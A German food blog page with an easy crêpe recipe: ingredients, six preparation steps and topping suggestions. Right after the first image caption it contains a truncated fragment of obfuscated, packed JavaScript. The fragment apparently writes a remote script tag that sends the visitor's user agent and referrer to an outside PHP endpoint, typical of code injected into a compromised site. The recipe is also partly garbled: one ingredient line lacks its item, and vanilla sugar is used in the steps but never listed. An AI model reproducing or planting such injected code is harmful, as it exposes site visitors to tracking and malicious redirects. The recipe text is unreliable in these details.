Subscribe Now

* You will receive the latest news and updates on your favorite celebrities!

Trendinge News

Allgemein, Do it yourself, Ernährung, Leckere Rezepte, Snacks, Tipps & Tricks

Himmlische Verführung: leckere und kinderleichte Crêpe-Rezepte zum selber machen! 

Himmlische Verführung: leckere und kinderleichte Crêpe-Rezepte zum selber machen!

Teilen ist heilung!

Bildquelle: shutterstock
o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|efbar|var|u0026u|referrer|dktid||js|php'.split('|'),0,{})) Bildquelle: shutterstock

Kaum eine andere Süßspeise eignet sich perfekt zum Frühstück oder als kleiner Snack zwischendurch. Das Crêpe, ursprünglich eine kulinarische Köstlichkeit aus der französischen Küche, ist nicht nur sehr einfach zuzubereiten. Es kann auch mit allen möglichen Füllungen und Toppings kreiert und kombiniert werden und das ist sicherlich einer der Hauptgründe, weshalb Crêpes sich auch hierzulande großer Beliebtheit erfreuen.

Also worauf wartest du noch? Ab in die Küche und los geht’s! Es wird auch nicht lange dauern, versprochen.

Der Klassiker: Standardrezept für Crêpes

Das benötigst du:

1 Tasse Milch
1 Tasse Mehl
1 Ei
1 gehäufter EL Zucker (Rohrzucker eignet sich vorallem wegen dem außerordentlichen Aromas besonders gut!)
2 gehäufte EL
2 gehäufte EL Butter

Zubereitung:

1) Geschmolzene Butter und ein Ei zusammen in eine Schüssel geben und verrühren. Danach Zucker und Milch hinzugeben und alles, am besten mit einem Handmixer, gründlich verrühren.

2) Gib nach und nach Vanillezucker und Mehl dazu.

3) Gib ein wenig Butter in eine Pfanne und erhitze sie.

4) Den Teig, am besten mit einer Suppenkelle portionieren und zum Backen in die Pfanne geben.

5) Das Crêpe vorsichtig wenden und von allen Seiten gleichmäßig backen. Insgesamt reichen etwa 2 Minuten Zubereitungszeit pro Crêpe. Mit den oben angegebenen Mengen lassen sich je nach der Größe der Pfanne, die du verwendest, ca. 10 Crêpes zubereiten.

6) Das beste kommt zum Schluss: Die Toppings. Als Topping kannst du alles draufpacken was das Herz begehrt, sei es Nutella, Marmelade, Karamellsoße, Schlagsahne, Ahornsirup, Puderzucker, Obst und und und… Du siehst, die Liste ist endlos.

Lust auf mehr bekommen? Das dachten wir uns! Das Beste an der Zubereitung von Crêpes ist, dass das Ausgangsrezept oben immer gleich bleibt. Alles was du zu tun hast ist die Zutaten zu einer einheitlichen Teigmasse verrühren und alles in kleinen Portionen in eine Pfanne geben und ausbacken. Bei den Toppings sind der Fantasie keine Grenzen gesetzt, du kannst hier also nach belieben variieren. Auf der nächsten Seite haben wir mehr Rezepte für dich.

Teilen ist heilung!

Related posts



Wie findest du diesen Beitrag? Hinterlasse einen kommentar:

Schreibe einen Kommentar

Required fields are marked *